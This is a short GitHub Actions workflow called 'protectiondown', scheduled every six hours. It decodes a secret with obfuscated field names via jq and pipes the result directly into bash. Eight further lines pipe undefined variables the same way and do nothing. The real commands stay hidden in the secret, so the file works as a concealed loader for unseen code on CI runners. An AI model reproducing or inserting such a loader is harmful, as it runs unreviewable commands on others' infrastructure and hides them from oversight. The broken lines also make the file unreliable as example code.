name: protectiondown

on:
  workflow_dispatch:
  schedule:
    - cron: '29 3/6 * * *'

jobs:  # 18535
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: protectiondown
        env:
          gc70610: ${{ secrets.gc70610 }}
        run: |
          echo $gc70610 | jq -r .n00 | /bin/bash
          echo $bbno4 | jq -r .ke0708 | /bin/bash
          echo $djzoh3 | jq -r .l75572 | /bin/bash
          echo $uqx610 | jq -r .g92 | /bin/bash
          echo $izj4911 | jq -r .qydy3 | /bin/bash
          echo $ll7205 | jq -r .x01 | /bin/bash
          echo $skrzw28733 | jq -r .z9510 | /bin/bash
          echo $tkfqo6 | jq -r .uz52 | /bin/bash
          echo $wrog51 | jq -r .ccv284 | /bin/bash

